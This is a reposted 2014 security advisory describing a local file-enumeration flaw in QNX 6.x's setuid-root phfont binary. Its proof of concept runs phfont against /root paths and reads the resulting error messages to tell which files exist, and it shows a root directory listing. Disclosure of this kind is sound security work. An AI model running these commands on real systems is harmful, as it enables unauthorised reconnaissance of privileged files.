QNX 6.x phfont Enumeration

2014.03.10
Credit: cenobyte
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# # QNX 6.x phfont file and directory enumeration vulnerability by cenobyte 2014 # <vincitamorpatriae@gmail.com> # # - vulnerability description: # QNX setuid root /usr/photon/bin/phfont allows any non-root user to enumerate # files and directories as root due to PfAttachLocalDllArgv() error messages. # # You can discover files and directories by observing the following error # messages and behaviour: # # 1) PfAttachLocalDllArgv(): Function not implemented # A file exists. # 2) PfAttachLocalDllArgv(): No such file or directory # A directory does not exist. # 3) And nothing will be returned when a directory exists. # # - vulnerable platforms: # QNX 6.5.0SP1 # QNX 6.5.0 # QNX 6.4.0 # # - not vulnerable: # QNX 6.3.0 $ id uid=100(user) gid=100 $ /usr/photon/bin/phfont -A -d /root/.ph $ /usr/photon/bin/phfont -A -d /root/doesnotexist $ PfAttachLocalDllArgv(): No such file or directory $ /usr/photon/bin/phfont -A -d /root/.profile $ PfAttachLocalDllArgv(): Function not implemented # ls -l /root total 13 drwx------ 5 root root 1024 Jan 07 16:24 . drwxr-xr-x 16 root root 1024 Oct 09 15:03 .. -rw-rw-r-- 1 root root 51 Jan 24 01:15 .lastlogin drwx------ 3 root root 1024 Sep 26 18:03 .mozilla drwxrwxr-x 3 root root 1024 Sep 27 15:36 .ph -rw-r--r-- 1 root root 191 Apr 20 2001 .profile drwx------ 2 root root 1024 Sep 26 18:11 .ssh


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top